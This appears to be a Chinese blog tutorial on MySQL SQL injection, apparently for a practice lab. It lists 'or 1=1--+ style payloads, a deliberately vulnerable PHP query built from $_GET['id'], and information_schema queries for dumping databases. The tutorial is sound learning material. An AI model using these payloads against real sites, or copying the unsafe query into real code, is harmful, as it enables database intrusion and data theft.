介绍几个常用函数:
1. version()——MySQL 版本
2. user()——数据库用户名
3. database()——数据库名
4. @@datadir——数据库路径
5. @@version_compile_os——操作系统版本
字符串连接函数
1. concat(str1,str2,...)——没有分隔符地连接字符串
2. concat_ws(separator,str1,str2,...)——含有分隔符地连接字符串
3. group_concat(str1,str2,...)——连接一个组的所有字符串,并以逗号分隔每一条数据 ,一般常用这个
说着比较抽象,其实也并不需要详细了解,知道这三个函数能一次性查出所有信息就行了。
一般尝试的语句
--+可以用#替换,url 提交过程中 Url 编码后的#为%23
or 1=1--+
'or 1=1--+
"or 1=1--+
)or 1=1--+
')or 1=1--+
") or 1=1--+
"))or 1=1--+
一般查询的代码为:
$id = $_GET['id'];
$sql = "select * from users where id = '$id' limit 0,1";
此处考虑两个点,一个是闭合前面你的 ‘ 另一个是处理后面的 ‘ ,一般采用两种思 路,闭合后面的引号或者注释掉,注释掉采用--+ 或者 #(%23)
Mysql 有一个系统数据库 information_schema,存储着所有的数据库的相关信息, 利用该表information_schema可以进行一次完整的注入,以下是一般流程
1、查询该数据库上存在的数据库
SELECT SCHEMA_NAME FROM information_schema.schemata;
2、猜某数据库的的数据表
SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA = "security";
3、猜某表的所有列
SELECT COLUMN_NAME FROM information_schema.columns WHERE TABLE_NAME = 'emails';
4、获取某列的数据
SELECT * FROM security.`emails`;
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
